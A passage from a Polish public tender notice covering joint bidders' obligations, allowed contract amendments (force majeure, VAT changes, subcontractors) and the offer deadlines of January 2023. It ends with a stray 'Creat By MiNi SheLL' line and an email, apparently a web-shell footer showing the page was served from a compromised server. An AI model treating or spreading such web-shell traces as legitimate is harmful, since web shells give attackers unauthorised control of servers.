spełnianie warunku, w zakresie i na zasadach opisanych w pkt<br/>2.1.2 SWZ.<br/>2) dokumenty i oświadczenia, o których mowa w pkt 3.5.2 SWZ składa każdy z nich.<br/>2.3.5. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, składają<br/>oświadczenie, z którego wynika, które usługi będą wykonywać poszczególni Wykonawcy – załącznik nr 4 do oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projekt umowy przedstawiono w załączniku nr 2 do niniejszej SWZ.<br/>I.<br/>Zmiana postanowień niniejszej umowy może nastąpić za zgodą obu Stron, wyrażoną na piśmie<br/>w drodze aneksu do niniejszej umowy, nie naruszając ustawy. Niedopuszczalna jest jednak pod<br/>rygorem nieważności zmiana istotnych postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział<br/>możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub specyfikacji warunków<br/>zamówienia oraz określił warunki takiej zmiany.<br/>1.Zmiana terminu realizacji umowy:<br/>1) jeżeli zmiana jest konieczna z powodu przedłużającej się procedury wyboru najkorzystniejszej<br/>oferty,<br/>2) jeżeli zmiana jest konieczna z powodu złożenia odwołania,<br/>3)jeżeli zmiana jest konieczna z powodu działania siły wyższej.<br/>W przypadku wystąpienia którejkolwiek z w/w okoliczności wymienionych termin wykonania<br/>umowy może ulec odpowiedniemu przedłużeniu, nie dłużej jednak niż o okres trwania tych<br/>okoliczności.<br/>Pod pojęciem siły wyższej Strony rozumieją nadzwyczajne niezależne od woli Stron zdarzenia, których wystąpieniu nie można było zapobiec, w szczególności powódź, pożar, huragan,<br/>trzęsienie ziemi, epidemie, decyzje i zarządzenia władz wprowadzające ograniczenia i<br/>restrykcje, w tym stany epidemii, kwarantanny, stany klęski żywiołowej, stany wyjątkowe ,<br/>zamieszki.<br/>Jeżeli jakiekolwiek opóźnienie spowodowane na skutek przyczyn określonych wyżej wystąpi lub<br/>będzie przewidywane , Strona opóźniona lub przewidująca opóźnienie powiadomi bezzwłocznie<br/>Stronę drugą na piśmie o zaistniałym lub spodziewanym opóźnieniu oraz o jego przyczynach i<br/>przewidywanym okresie trwania.<br/>2. Zmiany terminów i warunków płatności:<br/>1) będące następstwem wszelkich zmian wprowadzanych przez strony do umowy,<br/>2) będące następstwem korzystnych dla Zamawiającego rozwiązań zaproponowanych przez<br/>Wykonawcę,<br/>3. Zmiany związane z Podwykonawcami<br/>W przypadku, gdy zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego<br/>zasoby Wykonawca powoływał się, na zasadach określonych w pzp - art. 118 ust.1, w celu<br/>wykazania spełniania warunków udziału w postępowaniu, o których mowa w pzp, Wykonawca<br/>jest obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub<br/>Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie<br/>postępowania o udzielenie zamówienia. Przepisy art.122 pzp stosuję się odpowiednio. 4. Pozostałe zmiany:<br/>1) zmiana ustawowej stawki podatku VAT. W takim przypadku obniżenie lub podwyższenie<br/>wynagrodzenia i cen jednostkowych jest możliwe w wysokości odpowiadającej zmianie podatku,<br/>2) Zmiana wynagrodzenia w przypadku zmiany ustawowej stawki podatku Vat nastąpi wyłącznie<br/>w stosunku do niezrealizowanej w dniu zmiany stawki podatku od towarów i usług części<br/>zamówienia. Do określonego w ofercie wynagrodzenia w odniesieniu do niezrealizowanej części<br/>zamówienia zostanie zastosowana obowiązująca na dzień dokonania zmiany stawka podatku od<br/>towarów i usług. Zmiana wynagrodzenia nastąpi o kwotę wynikającą z różnicy między<br/>dotychczasową, a nową stawką podatku od towarów i usług.<br/>3) zmiany dotyczące nazwy i siedziby wykonawcy, jego formy organizacyjno-prawnej, numerów<br/>kont bankowych oraz innych danych identyfikacyjnych w trakcie trwania umowy lub następstwo<br/>prawne,<br/>4) zmiany mające na celu poprawę oczywistych omyłek pisarskich i rachunkowych w umowie,<br/>5) wprowadzenia zmian w stosunku do specyfikacji warunków zamówienia w zakresie<br/>wykonania prac nie wykraczających poza zakres przedmiotu umowy, w sytuacji konieczności<br/>usprawnienia procesu realizacji zamówienia.<br/>Informacje określono w pkt. 7 SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na mini Portalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na mini Portalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com